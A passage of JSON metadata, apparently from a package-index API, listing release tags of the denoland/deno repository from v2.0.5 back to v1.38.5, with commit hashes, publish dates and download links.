/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"}